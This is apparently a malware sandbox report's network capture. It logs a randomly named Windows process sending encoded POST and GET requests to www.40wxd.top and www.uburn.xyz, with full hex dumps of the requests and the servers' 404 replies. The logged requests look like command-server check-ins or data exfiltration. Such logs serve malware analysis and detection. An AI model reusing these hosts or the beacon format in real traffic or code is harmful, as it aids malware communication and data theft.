                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  3192.168.2.549978206.119.82.134804568C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 8, 2024 15:38:12.182101965 CEST1749OUTPOST /l8if/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Host: www.40wxd.top
                                                                                                                  Origin: http://www.40wxd.top
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: max-age=0
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 1239
                                                                                                                  Referer: http://www.40wxd.top/l8if/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Data Raw: 6e 56 3d 53 5a 66 34 5a 58 5a 4c 52 75 44 38 6e 41 70 43 70 42 4e 35 43 4c 69 74 33 46 46 41 71 59 4b 74 36 54 79 4e 47 32 30 67 54 6a 65 30 69 77 43 63 52 6f 4e 6d 32 6c 49 4c 46 50 4d 2f 6d 6d 2b 30 64 75 74 5a 52 50 63 50 70 48 79 45 6e 63 6e 47 64 6c 55 37 73 6d 52 51 6a 42 54 33 58 46 4f 68 71 44 7a 6b 54 61 33 30 4e 51 6c 5a 62 32 7a 41 64 7a 58 48 54 34 2f 46 52 6f 6d 39 72 63 4e 6d 33 74 66 39 76 73 39 39 52 66 56 52 69 2b 33 69 67 2f 69 65 6f 62 4b 57 30 36 39 34 67 59 55 74 78 50 41 46 36 52 78 58 45 49 4f 50 31 46 6c 79 61 74 44 4b 6a 35 35 57 61 32 50 6b 5a 71 37 5a 70 79 4e 53 75 45 6e 6b 67 41 74 46 46 4f 70 52 45 53 77 31 72 6c 42 59 54 43 4e 71 35 39 4b 52 78 62 42 39 31 5a 63 4b 69 65 6b 63 46 63 4f 63 6c 6e 47 4c 72 53 37 67 41 48 37 4b 70 49 68 4c 5a 41 78 46 7a 46 55 6c 59 48 54 58 6f 6b 74 4b 6c 79 44 54 6e 51 64 71 6a 7a 4d 38 51 6d 70 4c 6e 44 4b 45 34 54 61 68 67 55 56 65 32 42 4c 33 72 79 35 63 70 66 58 69 52 6f 4c 44 66 62 35 38 4e 46 63 4b 4a 6e 79 33 4c 71 43 58 53 4c 2f [TRUNCATED]
                                                                                                                  Data Ascii: nV=SZf4ZXZLRuD8nApCpBN5CLit3FFAqYKt6TyNG20gTje0iwCcRoNm2lILFPM/mm+0dutZRPcPpHyEncnGdlU7smRQjBT3XFOhqDzkTa30NQlZb2zAdzXHT4/FRom9rcNm3tf9vs99RfVRi+3ig/ieobKW0694gYUtxPAF6RxXEIOP1FlyatDKj55Wa2PkZq7ZpyNSuEnkgAtFFOpRESw1rlBYTCNq59KRxbB91ZcKiekcFcOclnGLrS7gAH7KpIhLZAxFzFUlYHTXoktKlyDTnQdqjzM8QmpLnDKE4TahgUVe2BL3ry5cpfXiRoLDfb58NFcKJny3LqCXSL/7Tjb1AJlBULXhai7gr4mdmjZE/W3UtJMTlYCsbCmkBkwdPfqEIsWy63lWKRIdpMPhzigL3SbZMJ9SsQ3LmcNo8Yccj+7QO+f2zSoU9WZjNjsoysjiFEzOO6x6rJqnCFgFFvL16wVNy9i/9JeScTCXN6z/AeWZ5GuUa9YvrH3gHuxbKA6UPCsLJAdhCrC/CDmlS0/6C+f11KbcqdTPLsC0Tf7AgGNOCASKzNDcYFWCDtWqaUEliJXvIJ7CNPmTVNFZpXJrn0b5UY6T3s8VcLcvq3m5wfcGQclZi7x7fhWJd8TbUlUN+WB1N+Ze+mi0r8toaE06wMch3iEICQhisUCGA6e4IfLFYYXm1JGDwZPhfaqRT8OO5/AAhbWxV2snyta9AVXYqmExUxYXXG/Vy/Rg1SDBJkh1XsT5vFGosyYu6KEOADfSOkY/naNX/Z+xRx2vNauLa2V5Ij3H7Wd2Q9J60uph+Y+k2H7wFDSIY8fytQu4koe8QmrAWP3BAdmTzLuOf404mge57VjY9ONVyKAkJDoeFydZVheb1XI0Pj6rX6+SrztZzEKjtAeVHC7Xlhc5BQJuSiXmapfgg23sUgUmwSz20MqntPWBJLeLgdWjGrfevSo69n58/8T9IUrfh8m2EsMe//PX4GYtMxOkacCrfv5p7K8tIbGVN [TRUNCATED]
                                                                                                                  Oct 8, 2024 15:38:13.091316938 CEST289INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx
                                                                                                                  Date: Tue, 08 Oct 2024 13:38:12 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 146
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  4192.168.2.549979206.119.82.134804568C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 8, 2024 15:38:14.722811937 CEST467OUTGET /l8if/?nV=fb3YagVOau/9jH9KlQpUGbOr1Qdfq6yMjiH+G1UmZCjbhiKuBNxm8T0bbvZrtC77cOtGQaEUv2efn6v6V0Ivj11bpGL/ZxGuw2XpQMT5FisIZ1T3bTfJHsfnS4K0yfQKpg==&ntHx=DVDDWR70P4Ux HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Host: www.40wxd.top
                                                                                                                  Connection: close
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Oct 8, 2024 15:38:15.641633987 CEST289INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx
                                                                                                                  Date: Tue, 08 Oct 2024 13:38:15 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 146
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  5192.168.2.54998067.223.117.189804568C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 8, 2024 15:38:20.794939995 CEST712OUTPOST /iqqs/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Host: www.uburn.xyz
                                                                                                                  Origin: http://www.uburn.xyz
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: max-age=0
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 203
                                                                                                                  Referer: http://www.uburn.xyz/iqqs/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Data Raw: 6e 56 3d 53 35 6e 4f 33 79 62 73 37 6d 73 36 54 61 39 73 50 4f 57 2f 74 73 77 74 6e 74 73 4b 42 7a 32 69 32 64 4b 4a 2f 69 63 41 54 41 50 57 4f 70 57 72 30 68 68 74 39 66 70 6f 4c 4d 68 53 68 79 65 64 4d 7a 63 59 65 61 42 77 46 64 7a 4d 31 50 41 66 44 51 4b 50 6d 78 53 79 7a 5a 6a 33 68 67 6e 69 43 72 2b 42 41 34 54 74 61 47 70 45 67 31 4f 55 6b 4e 68 55 45 56 43 74 6f 68 6e 5a 2b 30 50 71 4d 68 30 31 4f 39 61 4b 51 34 77 72 44 68 4d 45 6d 4f 38 64 44 6f 44 70 59 6e 33 79 39 70 55 36 76 58 32 4e 71 54 74 4e 43 59 41 58 30 51 56 68 5a 6a 53 6a 6c 33 7a 43 77 68 50 72 6d 35 6b 4e 4b 64 33 4e 38 4c 59 3d
                                                                                                                  Data Ascii: nV=S5nO3ybs7ms6Ta9sPOW/tswtntsKBz2i2dKJ/icATAPWOpWr0hht9fpoLMhShyedMzcYeaBwFdzM1PAfDQKPmxSyzZj3hgniCr+BA4TtaGpEg1OUkNhUEVCtohnZ+0PqMh01O9aKQ4wrDhMEmO8dDoDpYn3y9pU6vX2NqTtNCYAX0QVhZjSjl3zCwhPrm5kNKd3N8LY=
                                                                                                                  Oct 8, 2024 15:38:21.384052992 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                  Date: Tue, 08 Oct 2024 13:38:21 GMT
                                                                                                                  Server: Apache
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Content-Length: 32106
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
                                                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
                                                                                                                  Oct 8, 2024 15:38:21.384069920 CEST1236INData Raw: 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 34 2d 6e 61 76 62 61 72 2e 63
                                                                                                                  Data Ascii: rel="stylesheet"> <link href="assets/vendor/bootstrap/css/bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ... OWL CAROUSEL -->
                                                                                                                  Oct 8, 2024 15:38:21.384082079 CEST1236INData Raw: 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 67 2d 74 72 61 6e 73 70 61 72 65 6e 74 20 74 65 78 74 2d 77 68 69 74 65 22 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20
                                                                                                                  Data Ascii: <button type="submit" class="btn bg-transparent text-white"> <i class="fas fa-search"></i> </button> </div> </div> </form> </div> </div>... Loading Screen --><div id="ju-loading-scre
                                                                                                                  Oct 8, 2024 15:38:21.384094000 CEST1236INData Raw: 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 65 6e 67 6c 61 6e 64 2e 70 6e 67 22 20 61 6c 74 3d 22 65 6e 67 6c 61 6e 64 20 66 6c 61 67 22 20 63 6c 61 73 73 3d 22 6d 72 2d 31 22 3e 20 45 6e 67 6c 69 73 68 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20
                                                                                                                  Data Ascii: custom/images/england.png" alt="england flag" class="mr-1"> English</a> <a class="dropdown-item white-color font-13 fables-second-hover-color" href="#"> <img src="assets/custom/images/France.png"
                                                                                                                  Oct 8, 2024 15:38:21.384105921 CEST896INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 62 72 61 6e 64 20 70 6c 2d 30 22 20 68 72 65 66 3d 22 69 6e 64 65 78 2e 68 74 6d 6c 22 3e 3c 69 6d 67 20 73 72 63 3d
                                                                                                                  Data Ascii: <a class="navbar-brand pl-0" href="index.html"><img src="assets/custom/images/fables-logo.png" alt="Fables Template" class="fables-logo"></a> <button class="navbar-toggler" type="button" da
                                                                                                                  Oct 8, 2024 15:38:21.384366035 CEST1236INData Raw: 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 48 6f 6d 65 0a 20 20 20 20 20 20 20 20 20
                                                                                                                  Data Ascii: aria-expanded="false"> Home </a> <ul class="dropdown-menu" aria-labelledby="sub-nav1">
                                                                                                                  Oct 8, 2024 15:38:21.384598017 CEST1236INData Raw: 74 6f 67 67 6c 65 22 20 68 72 65 66 3d 22 23 22 3e 48 65 61 64 65 72 73 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63
                                                                                                                  Data Ascii: toggle" href="#">Headers</a> <ul class="dropdown-menu"> <li><a class="dropdown-item dropdown-toggle" href="#">Header 1</a>
                                                                                                                  Oct 8, 2024 15:38:21.384610891 CEST448INData Raw: 61 64 65 72 32 2d 74 72 61 6e 73 70 61 72 65 6e 74 2e 68 74 6d 6c 22 3e 48 65 61 64 65 72 20 32 20 54 72 61 6e 73 70 61 72 65 6e 74 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                  Data Ascii: ader2-transparent.html">Header 2 Transparent</a></li> <li><a class="dropdown-item" href="header2-light.html">Header 2 Light</a></li>
                                                                                                                  Oct 8, 2024 15:38:21.385274887 CEST1236INData Raw: 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20
                                                                                                                  Data Ascii: > <li><a class="dropdown-item dropdown-toggle" href="#">Header 3</a> <ul class="dropdown-menu">
                                                                                                                  Oct 8, 2024 15:38:21.385665894 CEST1236INData Raw: 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64
                                                                                                                  Data Ascii: ></li> <li><a class="dropdown-item" href="header4-dark.html">Header 4 Dark</a></li> </ul>
                                                                                                                  Oct 8, 2024 15:38:21.390625000 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22 3e 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                  Data Ascii: <ul class="dropdown-menu"> <li><a class="dropdown-item dropdown-toggle" href="#">Footer 1</a>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  6192.168.2.54998167.223.117.189804568C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 8, 2024 15:38:23.349253893 CEST732OUTPOST /iqqs/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Host: www.uburn.xyz
                                                                                                                  Origin: http://www.uburn.xyz
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: max-age=0
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 223
                                                                                                                  Referer: http://www.uburn.xyz/iqqs/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Data Raw: 6e 56 3d 53 35 6e 4f 33 79 62 73 37 6d 73 36 54 36 68 73 63 39 2b 2f 34 38 77 71 70 4e 73 4b 50 54 32 6d 32 64 47 4a 2f 6e 73 51 54 79 62 57 4f 4e 53 72 6d 31 39 74 38 66 70 6f 41 73 68 54 2f 43 65 67 4d 7a 59 2b 65 66 70 77 46 5a 62 4d 31 50 51 66 43 6e 2b 4d 6c 42 53 77 2b 35 6a 31 73 41 6e 69 43 72 2b 42 41 34 57 36 61 47 68 45 6e 46 2b 55 6d 73 68 58 48 56 43 71 72 68 6e 5a 30 55 50 6d 4d 68 30 54 4f 2b 66 6e 51 37 49 72 44 68 63 45 6e 66 38 65 57 59 43 69 47 6e 32 68 74 6f 4e 6d 69 57 33 43 32 31 34 72 65 4c 38 76 31 6d 34 4c 44 42 61 4c 32 58 66 36 67 79 48 63 33 4a 46 6b 51 2b 6e 39 69 63 4f 6b 51 35 48 6d 66 68 39 38 56 6d 65 45 72 64 32 73 46 36 78 37
                                                                                                                  Data Ascii: nV=S5nO3ybs7ms6T6hsc9+/48wqpNsKPT2m2dGJ/nsQTybWONSrm19t8fpoAshT/CegMzY+efpwFZbM1PQfCn+MlBSw+5j1sAniCr+BA4W6aGhEnF+UmshXHVCqrhnZ0UPmMh0TO+fnQ7IrDhcEnf8eWYCiGn2htoNmiW3C214reL8v1m4LDBaL2Xf6gyHc3JFkQ+n9icOkQ5Hmfh98VmeErd2sF6x7
                                                                                                                  Oct 8, 2024 15:38:23.946433067 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                  Date: Tue, 08 Oct 2024 13:38:23 GMT
                                                                                                                  Server: Apache
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Content-Length: 32106
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
                                                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
                                                                                                                  Oct 8, 2024 15:38:23.946451902 CEST1236INData Raw: 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 34 2d 6e 61 76 62 61 72 2e 63
                                                                                                                  Data Ascii: rel="stylesheet"> <link href="assets/vendor/bootstrap/css/bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ... OWL CAROUSEL -->
                                                                                                                  Oct 8, 2024 15:38:23.946464062 CEST448INData Raw: 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 67 2d 74 72 61 6e 73 70 61 72 65 6e 74 20 74 65 78 74 2d 77 68 69 74 65 22 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20
                                                                                                                  Data Ascii: <button type="submit" class="btn bg-transparent text-white"> <i class="fas fa-search"></i> </button> </div> </div> </form> </div> </div>... Loading Screen --><div id="ju-loading-scre
                                                                                                                  Oct 8, 2024 15:38:23.946588993 CEST1236INData Raw: 74 68 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 20 66 61 62 6c 65 73 2d 74 6f 70 2d 68 65 61 64 65 72 2d 73 69 67 6e 69 6e 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20
                                                                                                                  Data Ascii: th-background-color fables-top-header-signin"> <div class="container"> <div class="row" id="top-row"> <div class="col-12 col-sm-2 col-lg-5"> <div class="dropdown"> <button class="btn bt
                                                                                                                  Oct 8, 2024 15:38:23.946629047 CEST1236INData Raw: 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 66 61 62 6c 65 73 2d 74 68 69 72 64 2d 74 65 78 74 2d 63 6f 6c 6f 72 20 66 6f 6e 74 2d 31 33 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 61 62 6c 65 73 2d 69 63 6f 6e 70 68 6f 6e 65 22 3e 3c 2f 73 70 61
                                                                                                                  Data Ascii: <p class="fables-third-text-color font-13"><span class="fables-iconphone"></span> Phone : (888) 6000 6000 - (888) 6000 6000</p> </div> <div class="col-12 col-sm-5 col-lg-3 text-right"> <p class="fabl
                                                                                                                  Oct 8, 2024 15:38:23.946640015 CEST448INData Raw: 6f 6e 20 74 65 78 74 2d 77 68 69 74 65 20 66 6f 6e 74 2d 31 36 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                  Data Ascii: on text-white font-16"></span> </button> <div class="collapse navbar-collapse" id="fablesNavDropdown"> <ul class="navbar-nav mx-auto fables-nav">
                                                                                                                  Oct 8, 2024 15:38:23.947055101 CEST1236INData Raw: 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 48 6f 6d 65 0a 20 20 20 20 20 20 20 20 20
                                                                                                                  Data Ascii: aria-expanded="false"> Home </a> <ul class="dropdown-menu" aria-labelledby="sub-nav1">
                                                                                                                  Oct 8, 2024 15:38:23.947066069 CEST1236INData Raw: 74 6f 67 67 6c 65 22 20 68 72 65 66 3d 22 23 22 3e 48 65 61 64 65 72 73 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63
                                                                                                                  Data Ascii: toggle" href="#">Headers</a> <ul class="dropdown-menu"> <li><a class="dropdown-item dropdown-toggle" href="#">Header 1</a>
